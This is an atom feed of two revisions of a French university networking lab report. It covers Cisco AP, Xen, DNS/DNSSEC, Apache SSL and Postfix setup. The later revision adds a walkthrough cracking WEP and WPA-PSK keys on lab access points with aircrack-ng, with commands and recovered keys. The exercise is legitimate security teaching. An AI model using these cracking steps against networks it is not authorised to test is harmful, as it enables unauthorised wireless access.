https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=JturutWiki d'activités IMA - Contributions de l’utilisateur [fr]2026-04-24T15:56:14ZContributions de l’utilisateurMediaWiki 1.29.2https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35665TP sysres IMA2a5 2016/2017 G42016-12-06T11:38:04Z<p>Jturut : </p>
<hr />
<div><TABLE BORDER="1"> <br />
<CAPTION> Récapitulatif des IP </CAPTION> <br />
<TR> <br />
<TH> N° VLAN </TH> <br />
<TH> Prénom </TH> <br />
<TH> Réseau local </TH> <br />
<TH> Nom VM </TH> <br />
<TH> @IP VM </TH><br />
</TR><br />
<TR> <br />
<TD> VLAN20 </TD> <br />
<TD> Dimitri </TD> <br />
<TD> 10.60.20.0/24 </TD> <br />
<TD> Vald </TD><br />
<TD> 193.48.57.182/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN21 </TD> <br />
<TD> Nabil </TD> <br />
<TD> 10.60.21.0/24 </TD> <br />
<TD> Pnl </TD><br />
<TD> 193.48.57.177/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN22 </TD> <br />
<TD> Otmane </TD> <br />
<TD> 10.60.22.0/24 </TD> <br />
<TD> Lartiste </TD><br />
<TD> 193.48.57.178/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN23 </TD> <br />
<TD> Hugo </TD> <br />
<TD> 10.60.23.0/24 </TD> <br />
<TD> Gradur </TD><br />
<TD> 193.48.57.179/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN24 </TD> <br />
<TD> Clement </TD> <br />
<TD> 10.60.24.0/24 </TD> <br />
<TD> Gringe </TD><br />
<TD> 193.48.57.180/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN25 </TD> <br />
<TD> Joan </TD> <br />
<TD> 10.60.25.0/24 </TD> <br />
<TD> Orelsan </TD><br />
<TD> 193.48.57.181/28 </TD> <br />
</TR> <br />
</TABLE> <br />
<br />
<br />
== Configuration du point d'accès Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accès Cisco et à l'aide de la commande ci-dessous, on trouve sur quel port USB se trouve notre point d'accès<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètres de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accès à notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accès de notre point d'accès<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous ne possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuelle pour que chacun puisse réaliser un serveur DNS, Apache sur sa machine virtuelle.<br />
Pour créer la machine virtuelle, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connexion à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est dû à la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visibles sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mails, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat.<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci-dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clés, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signer les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est nécessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci-dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35664TP sysres IMA2a5 2016/2017 G42016-12-06T11:34:41Z<p>Jturut : </p>
<hr />
<div><TABLE BORDER="1"> <br />
<CAPTION> Récapitulatif des IP </CAPTION> <br />
<TR> <br />
<TH> N° VLAN </TH> <br />
<TH> Prénom </TH> <br />
<TH> Réseau local </TH> <br />
<TH> Nom VM </TH> <br />
<TH> @IP VM </TH><br />
</TR><br />
<TR> <br />
<TD> VLAN20 </TD> <br />
<TD> Dimitri </TD> <br />
<TD> 10.60.20.0/24 </TD> <br />
<TD> Vald </TD><br />
<TD> 193.48.57.182/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN21 </TD> <br />
<TD> Nabil </TD> <br />
<TD> 10.60.21.0/24 </TD> <br />
<TD> Pnl </TD><br />
<TD> 193.48.57.177/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN22 </TD> <br />
<TD> Otmane </TD> <br />
<TD> 10.60.22.0/24 </TD> <br />
<TD> Lartiste </TD><br />
<TD> 193.48.57.178/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN23 </TD> <br />
<TD> Hugo </TD> <br />
<TD> 10.60.23.0/24 </TD> <br />
<TD> Gradur </TD><br />
<TD> 193.48.57.179/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN24 </TD> <br />
<TD> Clement </TD> <br />
<TD> 10.60.24.0/24 </TD> <br />
<TD> Gringe </TD><br />
<TD> 193.48.57.180/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN25 </TD> <br />
<TD> Joan </TD> <br />
<TD> 10.60.25.0/24 </TD> <br />
<TD> Orelsan </TD><br />
<TD> 193.48.57.181/28 </TD> <br />
</TR> <br />
</TABLE> <br />
<br />
<br />
== Configuration du point d'accès Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accès Cisco et à l'aide de la commande ci-dessous, on trouve sur quel port USB se trouve notre point d'accès<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètres de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accès à notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accès de notre point d'accès<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous ne possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuelle pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuelle.<br />
Pour créer la machine virtuelle, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connexion à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du à la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mails, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci-dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signer les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
